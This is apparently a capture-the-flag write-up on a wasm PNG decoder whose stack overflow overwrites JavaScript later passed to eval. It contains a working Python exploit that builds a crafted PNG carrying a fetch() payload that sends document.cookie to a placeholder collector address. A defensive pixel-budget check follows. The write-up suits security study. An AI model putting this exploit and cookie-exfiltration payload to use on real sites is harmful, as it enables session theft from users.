# sigma

Take a look at `_emscripten_run_script`. Pass it a 30 to 40 KB PNG and the console reports:

```
Uncaught (in promise) RuntimeError: Aborted(Stack overflow! Stack cookie has been overwritten, expected hex dwords 0x89BACDFE and 0x2135467, but received 0xa37a4d42 a383)
```

Looking at the wasm memory, a block of it has been overwritten by PNG data. The idea is probably to construct a PNG such that the memory read by `call $env.emscripten_run_script` is overwritten while the wasm parses the image.

![](https://i.imgur.com/Dertm2b.png)

The wasm converts the PNG to RGBA and stores it somewhere that behaves like a stack. I constructed a PNG to see what the stack looks like (the parts after the DD bytes in the picture are all PNG data constructed by me).

![](https://i.imgur.com/nMZBp20.png)

A little further up from this place is where `run_script` reads the JS code.

![](https://i.imgur.com/BCahXFi.png)

When the PNG has more than 750000 pixels the stack overflows, and at about 750859 pixels the cookie from the error message is overwritten. So the stack overflow presumably overwrites the code that `run_script` will read, and that code is eventually passed to `eval`. This picture shows a PNG of 750,000 pixels; the address below is 2242832+3000032.
At the beginning it verifies whether the memory has been overwritten (probably a check for overflow?), so the RGBA pixels that follow the first 750,000 pixels of the constructed PNG must reproduce the original memory contents of that region.

![](https://i.imgur.com/EbwE2Yd.png)

Then use the XSS payload:

```python
from PIL import Image

qwq = []


def num2color(n):
    # Encode an integer as a big-endian (R, G, B) triple; kept for debugging
    # the layout, unused in the final payload.
    ret = []
    while True:
        s = n // 256
        ret.append(n % 256)
        if s == 0:
            break
        n = s
    ret.reverse()
    while len(ret) < 3:
        ret = [0] + ret
    return tuple(ret)


# Filler: 750,000 pixels of (0, 0, 0, 0xcc) bring the write up to the end of
# the stack region without overflowing it.
for i in range(1 * 750000):
    # u = (*num2color(i), 0xcc)
    u = (0, 0, 0, 0xcc)
    qwq.append(u)

# Original memory contents that follow the stack region, which must be
# reproduced so the overflow check passes, followed by the JS payload that
# run_script will read and eval. {ip:port} is the collector to fill in.
origin_mem = "\x42\x20\x04\x42\xEF\xBE\xAD\xDE\x8B\x59\x00\x00\x58\x0D\x50\x00"
origin_mem += "-+ 0X0x\00-0X+0X 0X-0x+0x 0x\00!num_bits\00tinfl_decompress\00nan\00inf\00miniz.c\00NAN\00INF\00.\00II*\00fetch('//{ip:port}', {mode: 'no-cors', method: 'POST', body: JSON.stringify(document.cookie)});\00(null"
print(len(origin_mem))
assert len(origin_mem) % 4 == 0

pic = Image.new("RGBA", (1, 750000 + len(origin_mem)))

# Each 4 bytes of memory become one RGBA pixel; the RGB channels are stored
# inverted so that the converter writes the intended bytes.
for i in range(len(origin_mem) // 4):
    data = origin_mem[i * 4:i * 4 + 4]
    pixel = (
        255 - ord(data[0]),
        255 - ord(data[1]),
        255 - ord(data[2]),
        ord(data[3]),
    )
    qwq.append(pixel)

pic.putdata(qwq)
pic.save("./out.png", "PNG")
```
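The root cause here is that the decoder writes an attacker-sized pixel buffer into a fixed-size stack region, with the stack cookie only catching the overflow after the memory has already been clobbered. The added example below is not part of the original write-up or of the challenge code: it shows the gate a defender would put in front of such a decoder, reading width and height from the PNG IHDR chunk (with signature and CRC validation) and rejecting the file before decoding if the pixel count exceeds a budget. The 750,000-pixel limit is assumed from the threshold observed above; `make_png_header` only builds a signature plus IHDR as constructed sample input, not a complete image.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Pixel budget assumed from the write-up: the converter's stack region held
# roughly 750,000 RGBA pixels before overflowing, so anything above that is
# refused before the decoder ever runs. Tune this to the real buffer size.
MAX_PIXELS = 750_000


def parse_ihdr(data):
    """Return (width, height) from a PNG's IHDR chunk.

    Validates the 8-byte signature, that IHDR is the first chunk with the
    mandatory 13-byte body, and the chunk CRC, so a truncated or tampered
    header is rejected rather than trusted.
    """
    if len(data) < 33 or data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG file")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a well-formed IHDR")
    body = data[16:29]
    (crc,) = struct.unpack(">I", data[29:33])
    if (zlib.crc32(ctype + body) & 0xFFFFFFFF) != crc:
        raise ValueError("IHDR CRC mismatch")
    width, height = struct.unpack(">II", body[:8])
    if width == 0 or height == 0:
        raise ValueError("zero-sized image")
    return width, height


def pixel_budget_ok(data, max_pixels=MAX_PIXELS):
    """True if the declared image fits the decoder's buffer, else False.

    Raises ValueError for malformed headers, which callers should also treat
    as a rejection.
    """
    width, height = parse_ihdr(data)
    return width * height <= max_pixels


def make_png_header(width, height):
    """Constructed sample input: signature + IHDR for an 8-bit RGBA image."""
    body = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF
    return PNG_SIGNATURE + struct.pack(">I", 13) + b"IHDR" + body + struct.pack(">I", crc)


if __name__ == "__main__":
    # 1 x 750000 fits; 1 x 750859 (the cookie-smashing size above) does not.
    for h in (750000, 750859):
        print(h, pixel_budget_ok(make_png_header(1, h)))
```

Checking `width * height` against the budget before decoding is the cheap fix; the complete fix is to size the destination buffer from the header (or heap-allocate it) so that the cookie never has to be the last line of defence.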